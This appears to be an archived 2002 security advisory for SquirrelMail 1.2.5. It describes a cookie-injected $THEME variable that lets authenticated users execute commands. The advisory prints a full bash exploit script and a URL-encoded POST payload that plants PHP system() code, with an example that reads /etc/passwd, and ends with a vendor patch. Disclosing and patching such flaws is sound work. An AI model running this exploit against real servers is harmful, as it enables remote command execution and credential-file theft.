Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: web5220.htm

squirrelmail - valid squirrelmail users can execute command



2nd Apr 2002 [SBWID-5220]
COMMAND

	valid squirrelmail users can execute command

SYSTEMS AFFECTED

	squirrelmail-1.2.5

PROBLEM

	pokleyzz sakamaniaka found following :
	

	email user  can append $THEME variable through cookies.
	

	

	

	---------------- start sq125x ---------------------

	

	#!/bin/bash

	#

	# squirrelmail-1.2.5 remote execution by pokleyzz 

	http://www.inetd-secure.net

	#

	# usage   : ./sq125x themecount username password 

	url command

	# example : ./sq125x 2 pokley 123456 

	http://mail.pokleyzz.my/mail \"cat /etc/passwd\"

	#

	# curl can be found at http://curl.haxx.se/libcurl/

	#

	

	export 

	PATH=\"/usr/bin:/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/l

	ocal/sbin\"

	export CURL=\"/usr/bin/curl\"

	export USERNAME=\"$2\"

	export PASSWORD=\"$3\"

	export THEME_COUNT=\"$1\"

	export URL=\"$4\"

	export COMMAND=`echo $5|sed \'s/\\ /%20/g\' -` 

	export TMPFILE=\"header.tmp\"

	export THEME=\"theme[${THEME_COUNT}][PATH]

	=../data/${USERNAME}.pref; theme

	[${THEME_COUNT}][NAME]=testing\"

	

	#step 1

	sed \"s/pokley/\"$USERNAME\"/g\" post.txt >lame.txt

	/bin/rm -rf ${TMPFILE}

	$CURL -b \"$THEME\" -d 

	login_username=${USERNAME} -d 

	secretkey=${PASSWORD} -d 

	js_autodetect_results=0 -d just_logged_in=1 -D 

	${TMPFILE} ${URL}/src/redirect.php

	export COOKIES=`cat ${TMPFILE} |grep Set-

	Cookie|awk {\'print $2\'}|while read data;do printf \'%b\' 

	$data;done`

	export COOKIES=\"${COOKIES} ${THEME}\"

	$CURL -b \"$COOKIES\" -d @lame.txt -o /tmp/.tmp --

	silent ${URL}/src/options.php

	

	#step 2

	sleep 5s

	$CURL -b \"$THEME\" -d 

	login_username=${USERNAME} -d 

	secretkey=${PASSWORD} -d 

	js_autodetect_results=0 -d just_logged_in=1 -D 

	${TMPFILE} ${URL}/src/redirect.php

	export COOKIES=`cat ${TMPFILE} |grep Set-

	Cookie|awk {\'print $2\'}|while read data;do printf \'%b\' 

	$data;done`

	export COOKIES=\"${COOKIES} ${THEME}\"

	$CURL -b \"$COOKIES\" -d @lame.txt -o /tmp/.tmp --

	silent ${URL}/src/options.php

	$CURL -b \"$COOKIES\" ${URL}/src/left_main.php?

	cmdd=${COMMAND}

	$CURL -b \"$COOKIES\" -o /tmp/.tmp --silent 

	${URL}/src/signout.php

	rm -rf lame.txt /tmp/.tmp

	-------------- end sq125 ----------------------

	

	-------------- start post.txt --------------------

	optpage=display&optmode=submit&new_chosen_the

	me=..%2Fdata%

	2Fpokley.pref&new_custom_css=none&new_languag

	e=&new_javascript_setting=2&new_js_autodetect_re

	sults=1&new_show_num=15%0D%0A%3C%3F+%

	0D%0Asystem%28%24cmdd%29%3B+%0D%0A%

	3F%

	3E&new_alt_index_colors=1&new_page_selector=1&

	new_page_selector_max=10&new_wrap_at=86&new

	_editor_size=76&new_location_of_buttons=between&

	new_use_javascript_addr_book=0&new_show_html_

	default=0&new_include_self_reply_all=1&new_show_

	xmailer_default=0&new_attachment_common_show_

	images=0&new_pf_subtle_link=1&new_pf_cleandispl

	ay=0&new_mdn_user_support=1&new_compose_ne

	w_win=0&delete_move_next_bi=on&delete_move_ne

	xt_formATbottomi=on&submit_display=Submit

	----------------------end post.txt --------------------------

	

SOLUTION

	Apply following patch, use CVS version, or wait for 1.2.6.
	

	 Patch

	 ======

	

	

	--- validate.php.orig	Sun Mar 31 16:15:52 2002

	+++ validate.php	Fri Mar 29 00:28:05 2002

	@@ -61,6 +61,15 @@

	 * Include them down here instead of at the top so that all config

	 * variables overwrite any passed in variables (for security).

	 */

	+

	+/**

	+ * Reset the $theme() array in case a value was passed via a cookie.

	+ * This is until theming is rewritten.

	+ */

	+global $theme;

	+unset($theme);

	+$theme=3Darray();

	+

	 require_once(\'../config/config.php\');

	 require_once(\'../src/load_prefs.php\');

	 require_once(\'../functions/page_header.php\');

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH